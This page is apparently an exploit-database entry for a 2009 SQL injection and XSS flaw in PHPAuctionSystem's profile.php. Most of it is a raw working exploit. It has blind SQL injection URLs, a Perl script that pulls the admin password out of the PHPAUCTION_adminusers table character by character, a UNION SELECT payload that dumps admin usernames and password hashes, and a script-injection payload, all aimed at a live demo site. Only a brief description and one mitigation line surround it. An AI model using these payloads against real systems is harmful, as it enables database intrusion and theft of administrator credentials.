header-logo
Suggest Exploit
vendor:
PHPAuctionSystem
by:
x0r
7.5
CVSS
HIGH
SQL Injection and XSS
89, 79
CWE
Product Name: PHPAuctionSystem
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHPAuctionSystem

The vulnerability exists due to insufficient sanitization of user-supplied input in 'user_id' and 'auction_id' parameters of 'profile.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Also, an attacker can inject arbitrary web script or HTML in the vulnerable page. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information, modify data, execute arbitrary SQL commands and inject arbitrary web script or HTML.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Also, it is recommended to use the latest version of the application.
Source

Exploit-DB raw data:

#########################
#PHPAuctionSystem#
#########################
Author:x0r
Email:andry2000@hotmail.it
Cms:PhpAuctionSystemvnew
Cmsprice:$59.99
Demo:http://www.phpauctions.info/demo/
##########################

BugIn:\profile.php(Blind\Normal Sql Injection)

Exploit(Blind):
profile.php?user_id=29%20and%20substring(@@version,1,1)=5--

profile.php?user_id=29%20and%20substring(@@version,1,1)=4--
		profile.php?user_id=29and+1=0--
		profile.php?user_id=29and+1=1--
Perl Exploit:

#!/usr/bin/perl -w

      use strict;

      use LWP::Simple;

      my $a;

  my $host = "http://www.phpauctions.info/demo/profile.php?user_id="; #Put
the victim i've used the demo

      my @chars = (48..57, 97..102);

 
      for my $i(1..32) {

         foreach my $ord(@chars) {

       

         $a =
get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");

       

         if($a =~ /coucou/i) {#put the username of the user_id=[id]

           syswrite(STDOUT,chr($ord));

           $i++;

           last;

          }

        }

      } 

Sql Injection: 
		
profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--		
			
		
Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode]

LiveDemo:http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=4--[False]
http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=5--[True]

LiveDemo(XSS):

http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9<script>alert(1);</script>

Live Demo Sql:

http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--


Greetz:MyGirlfriend...

# milw0rm.com [2009-01-05]

Navigation

Suggest Exploit

Services By CQR